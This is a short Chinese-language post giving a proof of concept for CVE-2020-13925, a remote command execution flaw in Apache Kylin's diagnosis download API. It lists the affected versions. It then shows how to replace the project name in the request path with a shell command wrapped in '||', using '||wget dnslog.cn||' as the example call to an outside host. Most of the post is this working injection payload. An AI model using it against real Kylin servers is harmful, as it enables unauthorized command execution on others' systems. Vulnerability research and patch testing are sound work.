# CVE-2020-13925 Apache Kylin 远程命令执行漏洞
影响版本:
– 2.3.0 – 2.3.2
– 2.4.0 – 2.4.1
– 2.5.0 – 2.5.2
– 2.6.0 – 2.6.4
– 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0
poc
“`
登录后访问 System-Configuration-Diagnosis,触发下载诊断信息的请求
http://host:port/kylin/api/diag/project/learn_kylin/download
GET
http://host:port/kylin/api/diag/project/||wget dnslog.cn||/download
即将项目名称“learn_kylin”替换为||cmd||
“`
[@bit4woo](https://github.com/bit4woo/CVE-2020-13925)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容